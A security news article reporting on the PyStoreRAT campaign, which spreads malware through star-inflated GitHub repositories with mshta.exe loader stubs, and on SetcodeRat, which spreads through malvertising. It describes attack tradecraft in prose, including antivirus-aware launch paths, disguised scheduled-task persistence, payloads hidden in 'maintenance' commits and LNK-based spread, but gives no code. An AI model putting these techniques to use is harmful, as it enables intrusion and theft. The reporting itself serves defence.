New Cyber Attack Uses GitHub to Sneak in Malicious Software

Cybersecurity investigators are sounding the alarm about a sneaky new operation. Attackers are using popular Python code repositories on GitHub—a platform many developers trust—to secretly spread a harmful program called PyStoreRAT.

This isn’t a typical attack. The bad actors are setting up what look like helpful coding tools, often focused on OSINT (Open-Source Intelligence) or utilities for popular technologies like GPT wrappers or decentralized finance (DeFi) bots. However, these repositories are essentially traps.

Morphisec security researcher Yonatan Edri explained that these seemingly innocent code collections contain only a small amount of Python or JavaScript. This tiny bit of code is programmed to do one thing silently: download a dangerous file (an HTA file) from a remote location and execute it using a standard Windows program called mshta.exe. This action kicks off the entire infection process.

The PyStoreRAT: A Highly Flexible Digital Weapon

The PyStoreRAT is a complex piece of malware, described as being “modular” and operating in multiple stages. Once it’s inside a computer, it can run many different types of malicious files, including standard Windows executables (EXE, DLL), scripts (PowerShell, Python, JavaScript), and installation files (MSI, HTA).

As if that weren’t bad enough, PyStoreRAT doesn’t work alone. It acts as a delivery mechanism for a second, even more specialized threat: an information-stealing program known as Rhadamanthys.

The campaign has been active since at least the middle of June 2025. The attackers are clever in how they make their fake tools look legitimate. They heavily promote these repositories on social media platforms like YouTube and X (formerly Twitter) and use underhanded tactics, such as artificially inflating the number of stars and forks the repositories have. This technique, which security experts have linked to the “Stargazers Ghost Network,” makes the repositories look popular and trustworthy on GitHub’s trending lists.

A Veneer of Trust Exploited

To execute their plan, the threat actors either create new GitHub accounts or use old, dormant ones. The most deceptive part of the attack comes later: after a fake tool starts to gain popularity, the attackers add the actual malicious payload hidden within what they label as a “maintenance” commit, usually around October and November. This is a deliberate move to bypass initial scrutiny once the code is already widely accepted.

In many cases, the supposed tools were practically useless, only showing a static menu or performing minimal, non-functional operations. The whole point was to abuse the inherent trust users place in GitHub. By tricking people into running the initial loader stub, the infection chain is started.

Once the remote HTA file is executed, the full PyStoreRAT malware is deployed. It immediately begins to check the infected computer’s security posture, profiling the system, checking for administrative access, and specifically looking for files related to popular cryptocurrency wallets, including Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.

The initial loader stub also contains a check for certain antivirus software. It looks for terms like “Falcon” (referring to CrowdStrike Falcon) or “Reason” (Cybereason or ReasonLabs) to avoid detection. If it finds one of these security products, it changes how it launches the attack by calling mshta.exe through the command prompt (cmd.exe), otherwise, it proceeds with a direct launch.

Final Stages and a Russian Connection

The malware ensures it stays on the infected machine by creating a persistent scheduled task disguised as an NVIDIA application update. In its final stage, the malware establishes contact with an external command server to receive and carry out instructions. The capabilities of the PyStoreRAT at this stage are extensive: it can download and run more executables (like the Rhadamanthys stealer), extract files from ZIP archives, execute malicious DLL files, run raw JavaScript code directly in memory using the eval() function, and install MSI packages. It can also open secondary mshta.exe processes for more remote HTA payloads and execute PowerShell commands. The malware even has the ability to spread to other systems by replacing legitimate documents on removable drives with malicious Windows Shortcut (LNK) files. To cover its tracks, it can delete the scheduled task used for persistence.

The identity of the attackers remains unknown, but Morphisec has noted the presence of Russian language elements and specific coding patterns, suggesting the group may originate from Eastern Europe. The firm stressed that PyStoreRAT shows a dangerous evolution toward modular, script-based threats that can easily adapt to different security measures. The combination of using Python for delivery, HTA/JS for execution, and logic to evade Falcon and other security solutions allows the malware to gain a silent, early foothold that many security tools might miss until it’s too late.

Another RAT Spreads Via Malvertising: SetcodeRat

Adding to the global threat landscape, Chinese security company QiAnXin has released details about a separate, new Remote Access Trojan called SetcodeRat. This malware appears to be spreading through deceptive online advertisements, a technique known as malvertising, and has been primarily targeting victims in China since October 2025. Hundreds of computers, including those in government and business organizations, have been compromised quickly.

SetcodeRat is designed to be highly specific in its targeting. The malicious installer package first checks the victim’s location. If the system’s language is not Chinese (specifically Mainland China, Hong Kong, Macao, or Taiwan), the program automatically quits. It also terminates if it cannot connect to a specific Bilibili URL.

The malware is disguised as a legitimate installer for popular programs, such as Google Chrome. Once the regional check is passed, the infection moves to the next stage, which involves a complex file-sideloading process. An executable file launches, which then loads a malicious DLL file that ultimately decrypts and runs the embedded SetcodeRat payload. SetcodeRat uses either Telegram or a standard command-and-control (C2) server to receive instructions for data theft. Its full list of capabilities includes logging keystrokes, capturing screenshots, gathering system and network data, manipulating files, and running system commands, enabling a wide-ranging data espionage operation.